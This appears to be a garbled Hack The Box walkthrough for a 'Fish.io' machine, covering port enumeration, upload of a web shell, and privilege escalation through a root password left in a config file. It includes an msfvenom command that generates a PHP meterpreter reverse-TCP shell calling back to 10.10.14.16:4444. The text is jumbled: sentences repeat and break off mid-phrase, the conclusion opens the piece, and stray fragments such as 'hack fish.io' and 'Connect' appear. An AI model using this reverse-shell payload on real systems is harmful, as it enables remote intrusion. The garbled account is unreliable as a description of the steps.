In this walkthrough, we demonstrated how to compromise the Fish.io box on Hack The Box. By identifying open ports, enumerating HTTP services, exploiting a web application vulnerability, and leveraging a misconfigured sudo command, we were able to gain root access to the system. This exercise highlights the importance of secure configuration, input validation, and access control in preventing similar attacks.
Next, we visit the HTTP service running on port 80: hack fish.io
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file: In this walkthrough, we demonstrated how to compromise
cat ~fish/config The file contains a password for the root user. We can now switch to the root user and gain full access to the system: Next, we visit the HTTP service running on
Connect